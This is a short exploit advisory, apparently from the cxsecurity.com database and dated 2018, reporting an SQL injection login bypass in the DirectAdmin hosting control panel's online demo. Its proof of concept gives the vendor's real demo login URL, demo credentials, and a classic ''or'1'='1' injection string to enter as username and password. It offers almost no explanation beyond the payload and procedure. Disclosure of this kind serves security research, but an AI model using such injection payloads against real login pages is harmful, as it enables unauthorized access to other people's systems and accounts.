DirectAdmin On-Line Demo SQLInjection

2018.10.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

++++++++++++++++++++++++++++++++++++++ # Exploit Title :DirectAdmin On-Line Demo SQLInjection # *Vendor*:http://www.directadmin.com/ # Author: Juan Carlos Garca # Blog: http://hackingmadrid.blogspot.com # Facebook https://www.facebook.com/pages/Tiger-Team/606699939344001?ref=hl DESCRIPTION +++++++++++ DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier. DirectAdmin is compatible with several versions of Red Hat, Fedora Core, Red Hat Enterprise Linux, CentOS, FreeBSD, Ubuntu and Debian. PoC ++++ https://www.directadmin.com:2222/CMD_LOGIN user:user_demo pass:demo OR user1: 'or'1'=1 pass1: 'or'1'=1 Procedure:Login using user1/pass1 ++++++++++++++++++++++++ Tiger Team Security Nightsec ++++++++++++++++++++++++


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top